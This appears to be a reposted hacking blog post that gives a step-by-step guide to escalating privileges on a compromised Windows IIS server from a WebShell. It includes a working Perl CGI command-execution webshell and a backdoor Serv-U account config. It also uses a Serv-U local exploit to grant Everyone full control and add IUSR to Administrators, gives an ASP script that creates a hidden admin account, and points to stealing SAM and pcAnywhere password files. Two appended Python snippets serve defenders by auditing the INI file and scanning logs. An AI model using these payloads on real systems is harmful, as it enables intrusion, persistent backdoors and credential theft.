Improve WebShell permission

xiaoxiao2021-03-05  25


When we get a WebShell, the next thing to do is to escalate privileges. My personal summary is as follows:

1. c:\documents and settings\all users\application data\symantec\pcanywhere
See if you can jump to this directory. If you can, that is best: download its CIF file directly, get the pcAnywhere password, and log in.

2. c:\winnt\system32\config
Download what is under it; the software that cracks the user passwords is LC and SAMInside.

3. c:\documents and settings\all users\"Start" menu\programs
See if you can jump here. We can get a lot of useful information from here because it shows many shortcuts. We generally choose Serv-U and view its properties locally. Once you know the path, see if you can jump into it. If you have permission to modify ServUDaemon.ini, add a user with an empty password:

    [USER=farruh|1]
    Password=
    HomeDir=c:\
    TimeOut=600
    Maintenance=System
    Access1=C:\|RWAMELCDP
    Access1=d:\|RWAMELCDP
    SKEYValues=

This user has the highest permission; we can then connect over FTP and use quote site exec xxx to escalate privileges.

4. c:\winnt\system32\inetsrv\data
This directory is also under Everyone full control. What we have to do is upload the privilege escalation tools and then execute them.

5. See if you can jump to the following directories:
c:\php, use phpspy
c:\pra, sometimes this directory; similarly, you can use a CGI WebShell:

    #!/usr/bin/perl
    binmode(STDOUT);
    syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
    $_ = $ENV{QUERY_STRING};
    s/%20/ /ig;
    s/%2f/\//ig;
    $execthis = $_;
    syswrite(STDOUT, "<HTML><PRE>\r\n", 13);
    open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
    system($execthis);
    syswrite(STDOUT, "\r\n</PRE></HTML>\r\n", 17);
    close(STDERR);
    close(STDOUT);
    exit;

Save it as a CGI file and execute it. If that does not work, try the .pl extension: rename the CGI file to a .pl file and submit http://xxxxx/cmd.pl?dir
If it displays "Access denied", that indicates it can be executed! Submit right away: first upload a su.exe (Serv-U privilege escalation tool) to the bin directory.
http://xxxxx/cmd.pl?c\perl\bin\su.exe
It returns:

    Serv-u >3.x local exploit by xiaolu
    USAGE: serv-u.exe "command"
    Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

We now have IUSR permissions. Submit:

    http://xxxxxx/cmd.pl?c\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F"
    http://xxxxxx/cmd.pl?c\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F"
    http://xxxxxx/cmd.pl?c\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F"
    http://xxxxxx/cmd.pl?c\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F"

If the following information is returned, it indicates success:

    Serv-u >3.x local exploit by xiaolu
    <220 Serv-U FTP Server v5.2 for WinSock ready...
    >User local name, need password.
    >Pass # L@ @
    <230 User logged in, proceed.
    >SITE MAINTENANCE
    [ ] Creating New Domain...
    <200-DomainID=2
    <220 Domain settings saved
    [ ] Domain xl:2 Created
    [ ] Creating Evil User
    <200-User=xl
    200 User settings saved
    [ ] Now Exploiting...
    >USER xl
    <331 User name okay, need password.
    >PASS 111111
    <230 User logged in, proceed.
    [ ] Now Executing: cacls.exe c: /E /T /G everyone:F
    <220 Domain deleted

In this way all partitions are under Everyone full control. Now we promote our user to administrator:

    http://xxxxxx/cmd.pl?c\perl\bin\su.exe "net localgroup administrators IUSR_anyhost /add"

6. If you can successfully run "cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps", you can escalate privileges.
Use cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps to view the DLL files that have privileges:
idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
Then add asp.dll to the privileged group. asp.dll is located at c:\winnt\system32\inetsrv\asp.dll (the location is not necessarily the same on different machines).
We now add it:

    cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\WINNT\system32\inetsrv\asp.dll"

You can use cscript adsutil.vbs get /W3SVC/InProcessIsapiApps to see whether it was added.

7. You can also try this code, although the effect does not seem to be significant:

    <%@codepage=936%>
    <%
    Response.Expires = 0
    On Error Resume Next
    Session.TimeOut = 50
    Server.ScriptTimeout = 3000
    Set lp = Server.CreateObject("WSCRIPT.NETWORK")
    oz = "WinNT://" & lp.ComputerName
    Set ob = GetObject(oz)
    Set oe = GetObject(oz & "/Administrators,group")
    Set od = ob.Create("user", "wekwen$")
    od.SetPassword "wekwen"   ' <---- password
    od.SetInfo
    Set of = GetObject(oz & "/wekwen$,user")
    oe.Add(of.ADsPath)
    Response.Write "wekwen$ super account established success!"
    %>

Use this code to check whether the escalation succeeded:

    <%@codepage=936%>
    <%
    Response.Expires = 0
    On Error Resume Next
    ' Find the accounts in the Administrators group
    Set tN = Server.CreateObject("Wscript.Network")
    Set objGroup = GetObject("WinNT://" & tN.ComputerName & "/Administrators,group")
    For Each admin In objGroup.Members
        Response.Write admin.Name & "<br>"
    Next
    If Err Then
        Response.Write "No: Wscript.Network"
    End If
    %>

8. c:\Program Files\Java Web Start
If you can get in here, the permissions are generally small; you can try using a JSP WebShell. I heard the permissions are very small; I have not met this case myself.

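For defenders, the ServUDaemon.ini change described in step 3 can be found by auditing the file for accounts with an empty password, system maintenance rights, or execute rights on a drive root. The following is an added example, not code from the original post; the sample file contents, the alice account and the function names are constructed for illustration, and reading the letter E in the rights string as the execute right is an assumption.

```python
import re

# Constructed sample using the [USER=...] layout from step 3; not real data.
SAMPLE_INI = r"""
[USER=alice|1]
Password=placeholder-hash
HomeDir=d:\ftp\alice
Access1=d:\ftp\alice|RWL
[USER=farruh|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
SKEYValues=
"""

SECTION = re.compile(r"^\[USER=([^|\]]+)\|\d+\]$", re.I)
DRIVE_ROOT = re.compile(r"^[a-z]:\\?$", re.I)

def parse_users(text):
    """Map user name -> [(key, value)], keeping repeated keys such as Access1."""
    users, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            m = SECTION.match(line)
            current = users.setdefault(m.group(1), []) if m else None
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            current.append((key.strip().lower(), value.strip()))
    return users

def audit(text):
    """Return {user: [reasons]} for accounts matching the step 3 pattern."""
    findings = {}
    for name, items in parse_users(text).items():
        reasons = []
        # Assumption: 'E' in the rights string is the execute right.
        for key, value in items:
            path, _, perms = value.partition("|")
            if key == "password" and not value:
                reasons.append("empty password")
            elif key == "maintenance" and value.lower() == "system":
                reasons.append("Maintenance=System")
            elif key.startswith("access") and DRIVE_ROOT.match(path) and "E" in perms.upper():
                reasons.append("execute on drive root " + path)
        if reasons:
            findings[name] = reasons
    return findings
```

Running audit() on a copy of the live file and comparing the result with the accounts the administrator actually created shows any entry that was added by editing the file directly.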
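The requests in step 5 leave a recognizable trace in the web server log: a .pl or .cgi script whose whole query string is a command line. The following detection sketch is an added example, not part of the original post; the log lines, addresses, timestamps and rule names are constructed, and the log is assumed to be in IIS W3C extended format with a #Fields header.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C extended log lines (addresses and times are made up).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-01-10 03:11:02 192.0.2.10 GET /index.asp id=7 200
2005-01-10 03:12:40 198.51.100.7 GET /cmd.pl dir 200
2005-01-10 03:13:05 198.51.100.7 GET /cmd.pl c:\\perl\\bin\\su.exe+%22cacls.exe+c:+/E+/T+/G+everyone:F%22 200
2005-01-10 03:14:19 198.51.100.7 GET /cmd.pl c:\\perl\\bin\\su.exe+%22net+localgroup+administrators+IUSR_anyhost+/add%22 200
2005-01-10 03:15:00 192.0.2.10 GET /search.pl q=cacls+documentation 200
"""

RULES = [
    ("grants Everyone full control",
     re.compile(r"\bcacls(\.exe)?\b.*\s/g\s+everyone:f", re.I)),
    ("adds account to Administrators",
     re.compile(r"\bnet\s+localgroup\s+administrators\b.*\s/add\b", re.I)),
    ("query is a bare command, not key=value", re.compile(r"^[^=&]+$")),
]
SCRIPT_EXT = (".pl", ".cgi")

def scan(log_text):
    """Return (client, script, decoded query, matched rule names) per suspicious request."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for the lines that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        rec = dict(zip(fields, line.split(" ")))
        if not rec.get("cs-uri-stem", "").lower().endswith(SCRIPT_EXT):
            continue
        query = unquote_plus(rec.get("cs-uri-query", "-"))
        if query == "-":                       # IIS logs an empty query as "-"
            continue
        matched = [name for name, rx in RULES if rx.search(query)]
        if matched:
            hits.append((rec["c-ip"], rec["cs-uri-stem"], query, matched))
    return hits
```

The benign /search.pl request that merely mentions cacls is not reported, because it is a normal key=value query and does not contain the grant pattern.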
Please credit the original address when reposting: https://www.9cbs.com/read-33604.html
